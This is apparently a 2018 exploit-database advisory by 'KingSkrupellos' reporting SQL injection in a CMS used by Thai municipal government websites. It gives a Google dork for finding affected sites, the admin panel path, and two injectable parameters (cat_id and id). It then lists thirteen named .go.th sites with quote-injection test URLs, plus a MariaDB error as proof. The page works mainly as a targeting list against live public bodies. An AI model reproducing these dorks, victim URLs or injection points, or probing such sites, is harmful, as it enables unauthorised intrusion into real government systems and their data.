facebook facebook twitter rss

Powered By PAS World Communitcation Ltd and Nakhonkorat ThailandGov SQL Injection Vulnerability

Author: KingSkrupellos , Published: 10-10-2018
# Exploit Title : Powered By PAS World Communitcation Ltd and Nakhonkorat ThailandGov SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Vendor Homepage : nakhonkorat.com
# Google Dork : intext:''Powered By :: PAS World Communitcation,.ltd. AND nakhonkorat.com''
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018090089

#################################################################################################

# Admin Control Panel Path => /admin/index.php

# Exploit :

/news.php?cat_id=[SQL Injection]

/detail.php?id=[SQL Injection]

#################################################################################################

# Example Vulnerable Sites =>

talasupcity.go.th/news.php?cat_id=1%27 => [ Proof of Concept ] => archive.is/3iibd

lamkaen.go.th/news.php?cat_id=14%27

suankluay.go.th/detail.php?id=251%27

klongkiew.go.th/detail.php?id=1%27

thungwa.go.th/detail.php?id=1%27

bangpradaeng.go.th/detail.php?id=1%27

sunthornphu.go.th/detail.php?id=1%27

senauthai.go.th/detail.php?id=1%27

chedihak.go.th/detail.php?id=1%27

narerk.go.th/detail.php?id=116%27

bangpra.go.th/detail.php?id=189%27

saton.go.th/detail.php?id=307%27

bavee.go.th/detail.php?id=156%27

# SQL Database Error =>

You have an error in your SQL syntax; check the manual that corresponds
to your MariaDB server version for the right syntax to use near '' ORDER BY d_date DESC, created' at line 1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :